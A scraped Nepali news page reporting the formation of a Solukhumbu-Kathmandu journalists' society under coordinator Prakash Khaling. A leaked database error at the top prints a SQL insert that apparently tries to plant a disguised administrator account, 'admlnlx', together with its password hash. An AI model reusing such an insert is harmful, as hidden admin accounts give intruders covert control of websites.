WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BSh30F3MqkA8TdouFt/g.7moYbk.3p0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 07:54:55', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, १० भाद्र, काठमाण्डौ । प्रकाश खालिङको संयोजकत्वमा सोलुखुम्बु-काठमाण्डौ पत्रकार समाज गठन गरिएको छ ।
हिजो सोमबार काठमाडौंमा आयोजित एक कार्यक्रमबीच खालिङको संयोजकत्वमा ७ सदस्यीय तदर्थ समिति गठन गरिएको हो । सोलुखुम्बुबाट काठमाडौं गई पत्रकारिता गर्नेहरुबीच अन्तरसम्बन्ध स्थापित गर्ने उद्देश्यसहित समाजको गठन गरिएको हो ।
समाजको तदर्थ समिति सदस्यमा भोजराज कार्की, बुद्धबीर बाहिङ, विक्रम श्रेष्ठ, मदन राई, तेज किराँती र डोमा शेर्पा रहेका छन् ।
काठमाडौंमा कार्यरत पत्रकारहरुको सहभागीतामा सोलुखुम्बुको विकास निर्माण र सुशासन कायम राख्न, सहि समाचार सम्प्रेषण र पत्रकारहरुलाई एक ढिका भै अघी बढ्नको लागि स्वतन्त्र संगठनको निर्माण गरिएको तर्दथ समितिका संयोजक प्रकाश खालिङले जानकारी दिए ।
समाजको तदर्थ समितिले भेला आयोजना गरी समाजसँग सरोकार राख्ने पत्रकारहरुको उपस्थीतिमा कार्यसमिति चयन गर्ने जनाएको छ ।